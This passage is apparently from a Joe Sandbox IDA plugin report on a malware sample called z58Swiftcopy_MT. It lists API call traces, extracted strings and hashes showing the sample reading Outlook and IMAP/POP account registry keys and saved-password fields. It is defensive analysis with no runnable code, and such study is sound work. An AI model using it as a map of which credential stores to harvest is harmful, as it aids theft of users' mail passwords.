                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1416211542-0
                                                                                                                                                                                                                                      • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                                                                                      • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                                                                      • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                                                                      • API String ID: 2360744853-2229823034
                                                                                                                                                                                                                                      • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                                                                                                                                                      • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402C9D
                                                                                                                                                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                                                                                                                                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402CF7
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00402D10
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00402D4E
                                                                                                                                                                                                                                        • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                                                                                                                                                                        • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                                                                                      • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                                                                                                      • API String ID: 1831126014-3814494228
                                                                                                                                                                                                                                      • Opcode ID: e8f6eaf9c13d0249a01ea98d471cb1a8874e737a8319c7d0390265d86dcdbfa3
                                                                                                                                                                                                                                      • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8f6eaf9c13d0249a01ea98d471cb1a8874e737a8319c7d0390265d86dcdbfa3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 004100E4
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                                                                        • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0041014D
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410129
                                                                                                                                                                                                                                        • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                                                                                                                                        • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410171
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 00410197
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                                                                      • String ID: \systemroot
                                                                                                                                                                                                                                      • API String ID: 912701516-1821301763
                                                                                                                                                                                                                                      • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                                                                                                                                      • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                                                                      • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                                                                                                                                                      • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                                                                                                                                                      • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                                                                                                                                                      • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                                                                      • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                                                                      • API String ID: 1640410171-2022683286
                                                                                                                                                                                                                                      • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                                                                                                                                                      • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$strlen
                                                                                                                                                                                                                                      • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                                                                      • API String ID: 2619041689-3408036318
                                                                                                                                                                                                                                      • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                                                                      • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A3E
                                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A4C
                                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A5D
                                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A74
                                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A7D
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00000000,762D0A60,?,00000000), ref: 00409C53
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,00000000,762D0A60,?,00000000), ref: 00409C6F
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0wE,00000014,?,?,00000000,762D0A60), ref: 00409C97
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014,?,?,00000000,762D0A60), ref: 00409CB4
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,00000000,762D0A60), ref: 00409D3D
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,?,?,?,?,00000000,762D0A60), ref: 00409D47
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,00000000,762D0A60), ref: 00409D7F
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,762D0A60), ref: 00408EBE
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,762D0A60), ref: 00408E31
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                                                                                                                                      • String ID: 0wE$`-v$`-v
                                                                                                                                                                                                                                      • API String ID: 2915808112-2625145802
                                                                                                                                                                                                                                      • Opcode ID: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
                                                                                                                                                                                                                                      • Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$strlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 667451143-3916222277
                                                                                                                                                                                                                                      • Opcode ID: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                                                                                                                                                                      • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(comctl32.dll,762D0A60,?,00000000,?,?,?,0040CF60,762D0A60), ref: 00404AB8
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,762D0A60), ref: 00404ADE
                                                                                                                                                                                                                                      • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                                      • API String ID: 2780580303-317687271
                                                                                                                                                                                                                                      • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                                                                                      • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00406D9B,?,?), ref: 00406CA1
                                                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00406D9B,?,?), ref: 00406CBF
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406CCC
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,00406D9B,?,?), ref: 00406CDC
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,00406D9B,?,?), ref: 00406CE6
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,Unknown Error,?,?,00406D9B,?,?), ref: 00406CF6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                                                                                      • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                                      • API String ID: 2881943006-572158859
                                                                                                                                                                                                                                      • Opcode ID: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
                                                                                                                                                                                                                                      • Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                                                                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                                                                                                                                        • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                                      • API String ID: 888011440-2039793938
                                                                                                                                                                                                                                      • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                                                                                                                                      • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • database is already attached, xrefs: 0042EA97
                                                                                                                                                                                                                                      • unable to open database: %s, xrefs: 0042EBD6
                                                                                                                                                                                                                                      • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                                                                                                                                                      • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                                                                                                                                                      • too many attached databases - max %d, xrefs: 0042E951
                                                                                                                                                                                                                                      • out of memory, xrefs: 0042EBEF
                                                                                                                                                                                                                                      • database %s is already in use, xrefs: 0042E9CE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                                      • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                                      • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                                                                      • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileStringstrchr
                                                                                                                                                                                                                                      • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                                                                                      • API String ID: 1348940319-1729847305
                                                                                                                                                                                                                                      • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                                                                      • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
